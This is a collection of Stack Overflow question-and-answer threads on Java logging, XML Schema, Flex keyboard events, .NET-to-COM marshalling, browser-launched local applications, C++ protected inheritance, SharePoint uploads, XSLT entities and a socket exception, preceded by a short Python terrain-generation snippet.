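If you do end up generating the height map yourself in Python, the fractal plasma mentioned above boils down to recursive midpoint displacement. A tiny 1D sketch (the full 2D grid version is the diamond-square algorithm):

import random

def midpoint_displace(left, right, depth, roughness=0.5):
    """Heights between two endpoints; returns 2**depth + 1 samples."""
    if depth == 0:
        return [left, right]
    mid = (left + right) / 2.0 + random.uniform(-1.0, 1.0) * roughness
    a = midpoint_displace(left, mid, depth - 1, roughness / 2.0)
    b = midpoint_displace(mid, right, depth - 1, roughness / 2.0)
    return a + b[1:]  # drop the duplicated midpoint

heights = midpoint_displace(0.0, 0.0, 6)
# Apply these as Z offsets to a row of mesh vertices; repeat per row
# (or do full diamond-square) for a whole terrain grid.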
{ "language": "en", "url": "https://stackoverflow.com/questions/31834", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "4" }
Q: Java Logging vs Log4J Is it still worth adding the log4j library to a Java 5 project just to log, let's say, some exceptions to a file with some nice rollover settings? Or will the standard util.logging facility do the job as well? What do you think? A: log4j is a much nicer package overall, and doesn't have some of the hiccups that java.util.logging contains. I'd second that using log4j directly is easier than using the commons logging. A: I recommend that you use the Simple Logging Facade for Java (SLF4J). It supports different providers that include Log4J and can be used as a replacement for Apache Commons Logging. A: I recommend using Apache Commons Logging as your logging interface. That way you have the flexibility to switch logging implementations anytime you want without requiring any code changes on your end. A: I would go with log4j. The possibilities of log4j are not obsolete at all! A: Log4j has been around for a long time, and it works very well. I have no scientific study to back it, but based on what I've seen at a large number of clients, it is easily the logging framework that I see used more than any other. It has been around for a long time, and not been replaced by the Next Big Logging Framework, which says something. It is dead simple to set up, and easy to learn the basic appenders (outputs). There is a whole host of appenders available, including: * *ConsoleAppender *DailyRollingFileAppender *ExternallyRolledFileAppender *FileAppender *JDBCAppender *JMSAppender *NTEventLogAppender *RollingFileAppender *SMTPAppender *SocketAppender *SyslogAppender *TelnetAppender *WriterAppender Plus others. It isn't difficult to write your own appender either. Additionally there is a great deal of flexibility in each of the appenders that allows you to control specifically what is output in your log. One note, I had a series of classloader problems when I used apache commons logging in addition to log4j. It was only for one specific application, but I found it simpler to use log4j alone, rather than to have the flexibility offered when using an abstraction layer like commons logging. See this article for more details. Good luck! A: java.util.logging offers a comprehensive logging package without the excess baggage some of the others provide. A: I'd say you're probably fine with util.logging for the needs you describe. For a good decision tree, have a look at Log4j vs java.util.logging Question One : Do you anticipate a need for any of the clever handlers that Log4j has that JUL does not have, such as the SMTPHandler, NTEventLogHandler, or any of the very convenient FileHandlers? Question Two : Do you see yourself wanting to frequently switch the format of your logging output? Will you need an easy, flexible way to do so? In other words, do you need Log4j's PatternLayout? Question Three : Do you anticipate a definite need for the ability to change complex logging configurations in your applications, after they are compiled and deployed in a production environment? Does your configuration sound something like, "Severe messages from this class get sent via e-mail to the support guy; severe messages from a subset of classes get logged to a syslog daemon on our server; warning messages from another subset of classes get logged to a file on network drive A; and then all messages from everywhere get logged to a file on network drive B"? And do you see yourself tweaking it every couple of days? If you can answer yes to any of the above questions, go with Log4j.
If you answer a definite no to all of them, JUL will be more than adequate and it's conveniently already included in the SDK. That said, pretty much every project these days seems to wind up including log4j, if only because some other library uses it.
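To make the rollover setup concrete, here is a minimal log4j.properties sketch (file names and paths are illustrative, not from the thread) that sends WARN and above to a daily rolling file -- roughly what the question asks for:

log4j.rootLogger=WARN, FILE
log4j.appender.FILE=org.apache.log4j.DailyRollingFileAppender
log4j.appender.FILE.File=logs/app.log
log4j.appender.FILE.DatePattern='.'yyyy-MM-dd
log4j.appender.FILE.layout=org.apache.log4j.PatternLayout
log4j.appender.FILE.layout.ConversionPattern=%d{ISO8601} %-5p [%t] %c - %m%n

Logging an exception from code is then a one-liner (MyClass and doWork are placeholders):

private static final Logger log = Logger.getLogger(MyClass.class); // org.apache.log4j.Logger

try {
    doWork();
} catch (IOException e) {
    log.error("doWork failed", e); // logs the message plus the full stack trace
}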
{ "language": "en", "url": "https://stackoverflow.com/questions/31840", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "149" }
Q: XML Schema construct for "Any number of these elements - in any order" I need to create an XML schema that looks something like this:
<xs:element name="wrapperElement">
<xs:complexType>
<xs:sequence>
<xs:element type="el1"/>
<xs:element type="el2"/>
</xs:sequence>
<xs:WhatGoesHere?>
<xs:element type="el3"/>
<xs:element type="el4"/>
<xs:element type="el5"/>
</xs:WhatGoesHere?>
<xs:sequence>
<xs:element type="el6"/>
<xs:element type="el7"/>
</xs:sequence>
</xs:complexType>
</xs:element>
What I need is a replacement for "WhatGoesHere" such that any number of el3, el4 and el5 can appear in any order. For instance, it could contain {el3, el3, el5, el3}.
Any idea on how to solve this?
A: You want xs:choice with occurrence constraints:
<xs:element name="wrapperElement">
  <xs:complexType>
    <xs:sequence>
      <xs:element name="el1"/>
      <xs:element name="el2"/>
      <xs:choice minOccurs="0" maxOccurs="unbounded">
        <xs:element name="el3"/>
        <xs:element name="el4"/>
        <xs:element name="el5"/>
      </xs:choice>
      <xs:element name="el6"/>
      <xs:element name="el7"/>
    </xs:sequence>
  </xs:complexType>
</xs:element>
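To see the constraint in action, an instance document like this (hand-written for illustration, not from the original posts) validates against the schema above, since the choice block accepts any number of el3/el4/el5 in any order:

<wrapperElement>
  <el1/>
  <el2/>
  <el3/>
  <el3/>
  <el5/>
  <el3/>
  <el6/>
  <el7/>
</wrapperElement>

And because of minOccurs="0", the whole middle block may also be omitted entirely.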
{ "language": "en", "url": "https://stackoverflow.com/questions/31847", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "9" }
Q: Capturing Cmd-C (or Ctrl-C) keyboard event from modular Flex application in browser or AIR It seems that it is impossible to capture the keyboard event normally used for copy when running a Flex application in the browser or as an AIR app, presumably because the browser or OS is intercepting it first.
Is there a way to tell the browser or OS to let the event through?
For example, on an AdvancedDataGrid I have set the keyUp event to handleCaseListKeyUp(event), which calls the following function:
private function handleCaseListKeyUp(event:KeyboardEvent):void
{
    var char:String = String.fromCharCode(event.charCode).toUpperCase();
    if (event.ctrlKey && char == "C")
    {
        trace("Ctrl-C");
        copyCasesToClipboard();
        return;
    }
    if (!event.ctrlKey && char == "C")
    {
        trace("C");
        copyCasesToClipboard();
        return;
    }
    // Didn't match event to capture, just drop out.
    trace("charCode: " + event.charCode);
    trace("char: " + char);
    trace("keyCode: " + event.keyCode);
    trace("ctrlKey: " + event.ctrlKey);
    trace("altKey: " + event.altKey);
    trace("shiftKey: " + event.shiftKey);
}
When run, I can never get the release of the "C" key while also pressing the command key (which shows up as KeyboardEvent.ctrlKey). I get the following trace results:
charCode: 0
char:
keyCode: 17
ctrlKey: false
altKey: false
shiftKey: false
As you can see, the only event I can capture is the release of the command key; the release of the "C" key while holding the command key isn't even sent.
Has anyone successfully implemented standard copy and paste keyboard handling?
Am I destined to just use the "C" key on its own (as shown in the code example) or make a copy button available? Or do I need to create the listener manually at a higher level and pass the event down into my modular application's guts?
A: I did a test where I listened for key up events on the stage and noticed that (on my Mac) I could capture control-c, control-v, etc. just fine, but anything involving command (the ⌘ key) wasn't captured until I released the command key, and then ctrlKey was false (even though the docs say that ctrlKey should be true for the command key on the Mac), and the charCode was 0. Pretty useless, in short.
A: Another incredibly annoying thing that I just realized is that ctrl-c can't be captured by event.ctrlKey && event.keyCode == Keyboard.C (or ...event.charCode == 67); instead you have to test for charCode or keyCode being 3. It kind of makes sense for charCode since ctrl-c is 3 in the ASCII table, but it doesn't make sense for keyCode, which is supposed to represent the key on the keyboard, not the typed character. The same goes for all other key combos (because every ctrl combo has an ASCII equivalent).
Edit Found a bug in the Flex bug system about this: https://bugs.adobe.com/jira/browse/FP-375
A: For me, the following works:
private var _ctrlHoldFlag:Boolean = false;
// Do something if CTRL was held down and C was pressed
// Otherwise release the ctrl flag if it was pressed
public function onKey_Up(event:KeyboardEvent):void
{
    var keycode_c:uint = 67;
    if (_ctrlHoldFlag && event.keyCode == keycode_c)
    {
        //do whatever you need on CTRL-C
    }
    if (event.ctrlKey)
    {
        _ctrlHoldFlag = false;
    }
}
// Track ctrl key down press
public function onKey_Down(event:KeyboardEvent):void
{
    if (event.ctrlKey)
    {
        _ctrlHoldFlag = true;
    }
}
A: I've found one workaround to this one based on the capture sequence.
When you press Cmd+A, for example, the sequence is:
* *type: KEY_DOWN, keyCode 15
*type: KEY_UP, keyCode 15
*type: KEY_DOWN, keyCode 65
So every time you get keyCode 15 down and then up, and the next capture is a down, you can assume that the user pressed the key combination. My implementation ended up like this:
protected var lastKeys:Array = [];
this.stage.addEventListener(KeyboardEvent.KEY_DOWN, keyHandler, false, 0, true);
this.stage.addEventListener(KeyboardEvent.KEY_UP, keyHandler, false, 0, true);
private function getCmdKey(ev:KeyboardEvent):Boolean {
    this.lastKeys.push(ev);
    this.lastKeys = this.lastKeys.splice(Math.max(0, this.lastKeys.length-3), 3);
    if (this.lastKeys.length < 3) return false;
    if (ev.keyCode != 15 && ev.type == KeyboardEvent.KEY_UP) {
        var firstKey:KeyboardEvent = this.lastKeys[0] as KeyboardEvent;
        var secondKey:KeyboardEvent = this.lastKeys[1] as KeyboardEvent;
        if (firstKey.keyCode == 15 && firstKey.type == KeyboardEvent.KEY_DOWN &&
            secondKey.keyCode == 15 && secondKey.type == KeyboardEvent.KEY_UP) {
            return true;
        }
    }
    return false;
}
private function keyHandler(ev:KeyboardEvent):void {
    var cmdKey:Boolean = this.getCmdKey(ev.clone() as KeyboardEvent);
    var ctrlKey:Boolean = ev.ctrlKey || cmdKey;
    if (ctrlKey) {
        if (ev.keyCode == 65) {
            // ctrl + "a"-- select all!
        }
    }
}
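Following the question's own last suggestion, registering the listener at the top of the display list is a small change. A sketch only (whether the runtime delivers the Cmd combination at all remains the Mac-specific problem described above), reusing the question's copyCasesToClipboard():

// In the top-level application, listen on the stage in the capture phase
stage.addEventListener(KeyboardEvent.KEY_UP, handleGlobalKeyUp, true);

private function handleGlobalKeyUp(event:KeyboardEvent):void {
    // Per the answers above, Ctrl-C may arrive as charCode 3 rather than 67
    if ((event.ctrlKey && String.fromCharCode(event.charCode).toUpperCase() == "C")
        || event.charCode == 3) {
        copyCasesToClipboard();
    }
}

This at least centralises the handling, so the individual modules don't each need their own listener.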
{ "language": "en", "url": "https://stackoverflow.com/questions/31849", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "3" }
Q: How to marshal an array of structs - (.Net/C# => C++) Disclaimer: Near-zero experience with marshalling concepts...
I have a struct B that contains a string + an array of structs C. I need to send this across the giant interop chasm to a COM - C++ consumer.
What is the right set of attributes I need to decorate my struct definition with?
[ComVisible (true)]
[StructLayout(LayoutKind.Sequential)]
public struct A
{
    public string strA;
    public B b;
}
[ComVisible (true)]
[StructLayout(LayoutKind.Sequential)]
public struct B
{
    public int Count;
    [MarshalAs(UnmanagedType.LPArray, ArraySubType=UnmanagedType.Struct, SizeParamIndex=0)]
    public C [] c;
}
[ComVisible (true)]
[StructLayout(LayoutKind.Sequential)]
public struct C
{
    public string strVar;
}
Edit: @Andrew: Basically this is my friend's problem. He has this thing working in .Net - he does some automagic to have the .tlb/.tlh created that he can then use in the C++ realm. Trouble is he can't fix the array size.
A: C++: The Most Powerful Language for .NET Framework Programming
I was about to approach a project that needed to marshal structured data across the C++/C# boundary, but I found what could be a better way (especially if you know C++ and like learning new programming languages). If you have access to Visual Studio 2005 or above you might consider using C++/CLI rather than marshaling. It basically allows you to create this magic hybrid .NET/native class library that's 100% compatible with C# (as if you had written everything in C#, for the purposes of consuming it in another C# project) that is also 100% compatible with C and/or C++.
In your case you could write a C++/CLI wrapper that marshals the data from C++ in-memory types to CLI in-memory types.
I've had pretty good luck with this, using pure C++ code to read and write out datafiles (this could be a third party library of some kind, even), and then my C++/CLI code converts (copies) the C++ data into .NET types, in memory, which can be consumed directly as if I had written the read/write library in C#. For me the only barrier was syntax, since you have to learn the CLI extensions to C++. I wish I'd had StackOverflow to ask syntax questions, back when I was learning this!
In return for trudging through the syntax, you learn probably the most powerful programming language imaginable. Think about it: the elegance and sanity of C# and the .NET libraries, and the low level and native library compatibility of C++. You wouldn't want to write all your projects in C++/CLI but it's great for getting C++ data into C#/.NET projects. It "just works."
Tutorial:
* *http://www.codeproject.com/KB/mcpp/cppcliintro01.aspx
A: The answer depends on what the native definitions are that you are trying to marshal to. You haven't provided enough information for anyone to be able to really help.
A common thing that trips people up when marshalling strings in native arrays is that native arrays often use a fixed-size buffer for the string that is allocated inline with the struct. Your definition is marshalling the strings as a pointer to another block of memory containing the string (which is the default).
[MarshalAs(UnmanagedType.ByValTStr, SizeConst = ##)] might be what you are looking for...
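To illustrate the fixed-size point above, here is a hedged sketch (struct names and sizes are invented for illustration) of how a native struct with an inline char buffer and an inline array of structs is typically declared on the managed side:

[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi)]
public struct NativeC
{
    // Fixed 64-char inline buffer, matching e.g. "char strVar[64]" in C++
    [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 64)]
    public string strVar;
}

[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi)]
public struct NativeB
{
    public int Count;
    // Fixed-length inline array, matching e.g. "NativeC c[16]" in C++;
    // only the first Count entries are meaningful
    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16, ArraySubType = UnmanagedType.Struct)]
    public NativeC[] c;
}

This only works when the native side really uses fixed-size buffers; a true variable-length array behind a pointer has to be marshalled manually (e.g. with Marshal.PtrToStructure in a loop).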
{ "language": "en", "url": "https://stackoverflow.com/questions/31854", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "2" }
Q: Good reasons for not letting the browser launch local applications I know this might be a no-brainer, but please read on.
I also know it's generally not considered a good idea, maybe the worst, to let a browser run and interact with local apps, even in an intranet context.
We use Citrix for home-office, and people really like it. Now, they would like the same kind of environment at work, a nice page where every important application/document/folder is nicely arranged and classified in an orderly fashion. These folks are not particularly tech savvy; I don't even consider thinking that they could understand the difference between remotely delivered applications and local ones.
So, I've been asked if it's possible. Of course, it is, with IE's good ol' ActiveX controls. And I even made a working prototype (that's where it hurts).
But now, I doubt. Isn't it madness to allow such 'dangerous' ActiveX controls, even in the 'local intranet' zone? People will use the same browser to surf the web; can I fully trust IE? Isn't there a risk that Microsoft would just disable those controls in future updates/versions? What if a website, or any kind of malware, just puts another site on the trust list? With that extent of control, you could just as well uninstall every protection and run amok till you get hanged by the IT dept.
I'm about to confront my superiors with the fact that, even though they've seen it is doable, it would be a very bad thing. So I'm desperately in need of good and strong arguments, because "let's don't" won't do it. Of course, if there is nothing to be scared of, that'll be nice too. But I strongly doubt that.
A: We use Citrix for home-office, and people really like it. Now, they would like the same kind of environment at work, a nice page where every important application/document/folder is nicely arranged and classified in an orderly fashion
I haven't used Citrix very many times, but what's it got to do with executing local applications? I don't see how "People like Citrix" and "browser executing local applications" relate at all?
If the people are accessing your Citrix server from home, and want the same experience in the office, then buy a cheap PC, and run the exact same Citrix software they run on their home computers. Put this computer in the corner and tell them to go use it. They'll be overjoyed.
Isn't it madness to allow such 'dangerous' ActiveX controls, even in the 'local intranet' zone? People will use the same browser to surf the web; can I fully trust IE?
Put it this way. IE has built-in support for AX controls. It uses its security mechanisms to prevent them from running unless in a trusted site. By default, no sites are trusted at all.
If you use IE at all then you're putting yourself at the mercy of these security mechanisms. Whether or not you tell it to trust the local intranet is beside the point, and isn't going to affect the operation of any other zones.
The good old security holes that require you to reboot your computer every few weeks when MS issues a patch will continue to exist and cause problems, regardless of whether you allow ActiveX in your local intranet.
Isn't there a risk that Microsoft would just disable those controls in future updates/versions?
Since XP-SP2, Microsoft has been making it increasingly difficult to use ActiveX controls. I don't know how many scary looking warning messages and "This might destroy your computer" dialogs you have to click through these days to get them to run, but it's quite a few. This will only get worse over time.
A: Microsoft is walking a fine line. On one hand, they regularly send ActiveX killbits with Windows Update to remove/disable applications that have been misbehaving. On the other hand, the latest version of Sharepoint 2007 (can't speak for earlier versions) allows for Office documents to be opened by clicking a link in the browser, and edited in the local application. When the edit is finished, the changes are transmitted back to the server and the webpage (generally) is refreshed. This is only an IE thing, as Firefox will throw up an error message.
I can see the logic behind it, though. Until Microsoft gets all of their apps 'in the cloud', there are cases that need to bridge the gap between the old client-side apps and a more web-centric business environment. While there is likely a non-web workaround, more and more information workers have come to expect that a large portion of their work will be done in a browser. Anything that makes the integration with the desktop easier is not going to be opposed by anyone except the sysadmins.
A: The standard citrix homepage (or how we use it) is a simple web page with program icons. Click on it, and the application gets delivered to you. People want the same thing, at work, with their applications/folders/documents. And because I'm a web developer, and they asked me, I do it with a web page... Perhaps I should pass the whole thing over to the VB guy..
Ahh... I know of 2 ways to accomplish this:
You can embed Internet Explorer into an application, and hook into it to intercept certain kinds of URLs and so on. I saw this done a few years ago - a telephony application embedded Internet Explorer in itself, and loaded some specially formatted webpages.
In the webpage there was this:
<a href="dial#1800-234-567">Call John Smith</a>
Normally this would be a broken URL, but when the user clicked on this link, the application containing the embedded IE got notified, and proceeded to execute its own custom code to dial the number from the URL.
You could get your VB guy to write an application which basically just wraps IE, and has handlers for executing applications. You could then code normal webpages with links to just open applications, and the VB app would launch them. This allows you to write your own security stuff (like, only launch applications in a preset list, or so on) into the VB app, and because VB is launching them, not IE, none of the IE security issues will be involved.
The second way is with browser plug-ins. For example, Skype comes with a Firefox plug-in, which looks for phone numbers in web pages, and attaches special links to them. When you click on these links it invokes Skype - you could conceivably do something similar for launching your citrix apps.
You'd then be tied to Firefox though. Writing plugins for IE is much harder than for FF; I wouldn't go down that path unless forced to.
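One relatively contained middle ground the last answer hints at is a custom URL protocol: instead of granting the browser blanket ActiveX rights, you register a scheme that launches one specific, vetted launcher application. A sketch of the registry entries (the scheme name "corpapp" and the paths are invented for illustration; the mechanism itself is the standard Windows protocol-handler registration, not something from the thread):

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\corpapp]
@="URL:CorpApp Protocol"
"URL Protocol"=""

[HKEY_CLASSES_ROOT\corpapp\shell\open\command]
@="\"C:\\Program Files\\CorpLauncher\\Launcher.exe\" \"%1\""

A link such as <a href="corpapp:payroll">Payroll</a> then starts only Launcher.exe, which can validate the argument against a whitelist before starting anything, keeping the attack surface far smaller than a scriptable ActiveX control.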
{ "language": "en", "url": "https://stackoverflow.com/questions/31865", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "1" }
Q: Are there any examples where we *need* protected inheritance in C++? While I've seen rare cases where private inheritance was needed, I've never encountered a case where protected inheritance is needed. Does someone have an example?
A: There is a very rare use case of protected inheritance. It is where you want to make use of covariance:
struct base {
    virtual ~base() {}
    virtual base & getBase() = 0;
};
struct d1 : private /* protected */ base {
    virtual base & getBase() { return *this; }
};
struct d2 : private /* protected */ d1 {
    virtual d1 & getBase () { return *this; }
};
The previous snippet tried to hide its base class, and provide controlled visibility of bases and their functions, for whatever reason, by providing a "getBase" function.
However, it will fail in struct d2, since d2 does not know that d1 is derived from base. Thus, covariance will not work. A way out of this is to derive them protected, so that the inheritance is visible in d2.
A similar example of using this is when you derive from std::ostream, but don't want random people to write into your stream. You can provide a virtual getStream function that returns std::ostream&. That function could do some preparation of the stream for the next operation. For example putting certain manipulators in.
std::ostream& d2::getStream() {
    this->width(10);
    return *this;
}
logger.getStream() << "we are padded";
A: People here seem to confuse protected class inheritance and protected methods.
FWIW, I've never seen anyone use protected class inheritance, and if I remember correctly I think Stroustrup even considered the "protected" level to be a mistake in C++. There's precious little you cannot do if you remove that protection level and only rely on public and private.
A: C++ FAQ Lite mentions a case where using private inheritance is a legitimate solution (See [24.3.] Which should I prefer: composition or private inheritance?). It's when you want to call the derived class from within a private base class through a virtual function (in this case derivedFunction()):
class SomeImplementationClass {
protected:
    void service() {
        derivedFunction();
    }
    virtual void derivedFunction() = 0;
    // virtual destructor etc
};
class Derived : private SomeImplementationClass {
    void someFunction() {
        service();
    }
    virtual void derivedFunction() {
        // ...
    }
    // ...
};
Now if you want to derive from the class Derived, and you want to use SomeImplementationClass::service() from within the derived class (say you want to move Derived::someFunction() to the derived class), the easiest way to accomplish this is to change the private inheritance of SomeImplementationClass to protected inheritance.
Sorry, can't think of a more concrete example. Personally I like to make all inheritance public so as to avoid wasting time with "should I make the inheritance relation protected or private" discussions.
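To restate the covariance point as a self-contained sketch (illustrative code, not taken from the original answers): with private inheritance the grandchild cannot name the base, while protected inheritance keeps the relationship usable down the hierarchy without exposing it to outside callers:

#include <iostream>

struct base {
    virtual ~base() {}
    virtual void describe() const { std::cout << "base\n"; }
};

struct d1 : protected base {          // outsiders cannot see that d1 is-a base
    virtual void describe() const { std::cout << "d1\n"; }
};

struct d2 : protected d1 {
    // Compiles only because the d1->base edge is protected, not private:
    // d2, as a descendant, may still use the inherited base part.
    base& asBase() { return *this; }
};

int main() {
    d2 obj;
    obj.asBase().describe();          // prints "d1" via virtual dispatch
    // base& b = obj;                 // error: base is an inaccessible base of d2
    return 0;
}

Swap d1's inheritance to private and the asBase() conversion in d2 stops compiling, which is exactly the failure mode the first answer describes.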
{ "language": "en", "url": "https://stackoverflow.com/questions/31867", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "14" }
Q: Upload a file to SharePoint through the built-in web services What is the best way to upload a file to a Document Library on a SharePoint server through the built-in web services that version WSS 3.0 exposes?
Following the two initial answers...
* *We definitely need to use the Web Service layer as we will be making these calls from remote client applications.
*The WebDAV method would work for us, but we would prefer to be consistent with the web service integration method.
There is additionally a web service to upload files, painful but works all the time.
Are you referring to the “Copy” service? We have been successful with this service’s CopyIntoItems method. Would this be the recommended way to upload a file to Document Libraries using only the WSS web service API?
I have posted our code as a suggested answer.
A: Another option is to use plain ol' HTTP PUT:
WebClient webclient = new WebClient();
webclient.Credentials = new NetworkCredential(_userName, _password, _domain);
webclient.UploadFile(remoteFileURL, "PUT", FilePath);
webclient.Dispose();
Where remoteFileURL points to your SharePoint document library...
A: There are a couple of things to consider:
* *Copy.CopyIntoItems needs the document to be already present at some server. The document is passed as a parameter of the webservice call, which will limit how large the document can be. (See http://social.msdn.microsoft.com/Forums/en-AU/sharepointdevelopment/thread/e4e00092-b312-4d4c-a0d2-1cfc2beb9a6c)
*the 'http put' method (i.e. WebDAV...) will only put the document in the library, but not set field values
*to update field values you can call Lists.UpdateListItem after the 'http put'
*document libraries can have directories; you can make them with 'http mkcol'
*you may want to check in files with Lists.CheckInFile
*you can also create a custom webservice that uses the SPxxx .Net API, but that new webservice will have to be installed on the server. It could save trips to the server.
A: public static void UploadFile(byte[] fileData) {
    var copy = new Copy {
        Url = "http://servername/sitename/_vti_bin/copy.asmx",
        UseDefaultCredentials = true
    };
    string destinationUrl = "http://servername/sitename/doclibrary/filename";
    string[] destinationUrls = {destinationUrl};
    var info1 = new FieldInformation {
        DisplayName = "Title",
        InternalName = "Title",
        Type = FieldType.Text,
        Value = "New Title"
    };
    FieldInformation[] info = {info1};
    var copyResult = new CopyResult();
    CopyResult[] copyResults = {copyResult};
    copy.CopyIntoItems(
        destinationUrl, destinationUrls, info, fileData, out copyResults);
}
NOTE: Changing the 1st parameter of CopyIntoItems to the file name, Path.GetFileName(destinationUrl), makes the unlink message disappear.
A: I've had good luck using the DocLibHelper wrapper class described here: http://geek.hubkey.com/2007/10/upload-file-to-sharepoint-document.html
A: Example of using the WSS "Copy" Web service to upload a document to a library...
public static void UploadFile2007(string destinationUrl, byte[] fileData)
{
    // List of destination URLs, just one in this example.
    string[] destinationUrls = { Uri.EscapeUriString(destinationUrl) };
    // Empty Field Information. This can be populated but not for this example.
    SharePoint2007CopyService.FieldInformation information = new SharePoint2007CopyService.FieldInformation();
    SharePoint2007CopyService.FieldInformation[] info = { information };
    // To receive the result Xml.
    SharePoint2007CopyService.CopyResult[] result;
    // Create the Copy web service instance configured from the web.config file.
    SharePoint2007CopyService.CopySoapClient CopyService2007 = new CopySoapClient("CopySoap");
    CopyService2007.ClientCredentials.Windows.ClientCredential = CredentialCache.DefaultNetworkCredentials;
    CopyService2007.ClientCredentials.Windows.AllowedImpersonationLevel = System.Security.Principal.TokenImpersonationLevel.Delegation;
    CopyService2007.CopyIntoItems(destinationUrl, destinationUrls, info, fileData, out result);
    if (result[0].ErrorCode != SharePoint2007CopyService.CopyErrorCode.Success)
    {
        // ...
    }
}
A: From a colleague at work:
Lazy way: your Windows WebDAV filesystem interface. It is bad as a programmatic solution because it relies on the WebClient service running on your OS, and also only works on websites running on port 80. Map a drive to the document library and get with the file copying.
There is additionally a web service to upload files, painful but works all the time.
I believe you are able to upload files via the FrontPage API but I don’t know of anyone who actually uses it.
A: Not sure exactly which web service to use, but if you are in a position where you can use the SharePoint .NET API Dlls, then using the SPList and SPLibrary.Items.Add is really easy.
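For completeness, the server-side object model route mentioned in the last answer looks roughly like this (a hedged sketch: it must run on the SharePoint server itself, and the URLs, library and file names are placeholders):

using (SPSite site = new SPSite("http://servername/sitename"))
using (SPWeb web = site.OpenWeb())
{
    SPFolder folder = web.GetFolder("Shared Documents");
    byte[] fileData = System.IO.File.ReadAllBytes(@"C:\temp\report.docx");
    // Third parameter: overwrite an existing file with the same name
    SPFile file = folder.Files.Add("report.docx", fileData, true);
    file.Item["Title"] = "New Title";
    file.Item.Update();
}

It is much less code than the web service route, but of course it doesn't apply to the remote-client scenario the question settled on.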
{ "language": "en", "url": "https://stackoverflow.com/questions/31868", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "31" }
Q: Using an HTML entity in XSLT (e.g. &nbsp;) What is the best way to include an html entity in XSLT?
<xsl:template match="/a/node">
    <xsl:value-of select="."/>
    <xsl:text>&nbsp;</xsl:text>
</xsl:template>
this one returns an XsltParseError
A: this one returns an XsltParseError
Yes, and the reason for that is that &nbsp; is not a predefined entity in XML or XSLT as it is in HTML.
You could just use the Unicode character which &nbsp; stands for: &#160;
A: XSLT only handles the five basic entities by default: lt, gt, apos, quot, and amp. All others need to be defined as @Aku mentions.
A: Now that there's Unicode, it's generally counter-productive to use named character entities. I would recommend using the Unicode character for a non-breaking space instead of an entity, just for that reason. Alternatively, you could use the entity &#160;, instead of the named entity. Using named entities makes your XML dependent on an inline or external DTD.
A: It is also possible to extend the approach from the 2nd part of aku's answer and get all known character references available, like this:
<!DOCTYPE stylesheet [
    <!ENTITY % w3centities-f PUBLIC "-//W3C//ENTITIES Combined Set//EN//XML"
        "http://www.w3.org/2003/entities/2007/w3centities-f.ent">
    %w3centities-f;
]>
...
<xsl:text>&nbsp;&minus;30&deg;</xsl:text>
There is a certain difference in the result as compared to the <xsl:text disable-output-escaping="yes"> approach. The latter one is going to produce string literals like &nbsp; for all kinds of output, even for <xsl:output method="text">, and this may happen to be different from what you might wish... On the contrary, getting entities defined for the XSLT template via <!DOCTYPE ... <!ENTITY ... will always produce output consistent with your xsl:output settings.
It may be wise then to use a local entity resolver to keep the XSLT engine from fetching character entity definitions from the Internet. JAXP or explicit Xalan-J users may need a patch for Xalan-J to use the resolver correctly. See my blog XSLT, entities, Java, Xalan... for patch download and comments.
A: One other possibility for using HTML entities from within XSLT is the following:
<xsl:text disable-output-escaping="yes">&amp;nbsp;</xsl:text>
A: You can use CDATA section
<xsl:text disable-output-escaping="yes"><![CDATA[&nbsp;]]></xsl:text>
or you can describe &nbsp; in a local DTD:
<!DOCTYPE xsl:stylesheet [ <!ENTITY nbsp "&#160;"> ]>
or just use &#160; instead of &nbsp;
A: I found all of these solutions produced a Â character in the blank space.
Using <xsl:text> </xsl:text> solved the problem for me; but <xsl:text>&#x20;</xsl:text> might work as well.
A: Thank you for your information. I have written a short blog post based on what worked for me as I was doing XSLT transformation in a template of the Dynamicweb CMS.
The blog post is here: How to add entities to XSLT templates.
/Sten Hougaard
A: It is necessary to use the entity &#x160;
A: I had no luck with the DOCTYPE approach from Aku.
What worked for me in MSXML transforms on a Windows 2003 server, was
<xsl:text disable-output-escaping="yes">&amp;#160;</xsl:text>
Sort of a hybrid of the above. Thanks Stack Overflow contributors!
A: One space character between text tags should be enough.
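Putting the most portable pieces of the answers together, a minimal complete stylesheet using the local-DTD approach would look like this (the match pattern is the one from the question; everything else is standard XSLT 1.0):

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xsl:stylesheet [
    <!ENTITY nbsp "&#160;">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
    <xsl:template match="/a/node">
        <xsl:value-of select="."/>
        <xsl:text>&nbsp;</xsl:text>
    </xsl:template>
</xsl:stylesheet>

Because the entity is resolved at parse time, this works with any output method and does not depend on disable-output-escaping.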
{ "language": "en", "url": "https://stackoverflow.com/questions/31870", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "67" }
Q: WSACancelBlockingCall exception Ok, I have a strange exception thrown from my code that's been bothering me for ages.
System.Net.Sockets.SocketException: A blocking operation was interrupted by a call to WSACancelBlockingCall
at System.Net.Sockets.Socket.Accept()
at System.Net.Sockets.TcpListener.AcceptTcpClient()
MSDN isn't terribly helpful on this: http://msdn.microsoft.com/en-us/library/ms741547(VS.85).aspx and I don't even know how to begin troubleshooting this one. It's only thrown 4 or 5 times a day, and never in our test environment. Only in production sites, and on ALL production sites.
I've found plenty of posts asking about this exception, but no actual definitive answers on what is causing it, and how to handle or prevent it.
The code runs in a separate background thread, the method starts:
public virtual void Startup()
{
    TcpListener serverSocket = new TcpListener(new IPEndPoint(bindAddress, port));
    serverSocket.Start();
then I run a loop putting all new connections as jobs in a separate thread pool. It gets more complicated because of the app architecture, but basically:
    while ((socket = serverSocket.AcceptTcpClient()) != null) //Funny exception here
    {
        connectionHandler = new ConnectionHandler(socket, mappingStrategy);
        pool.AddJob(connectionHandler);
    }
}
From there, the pool has its own threads that take care of each job in its own thread, separately.
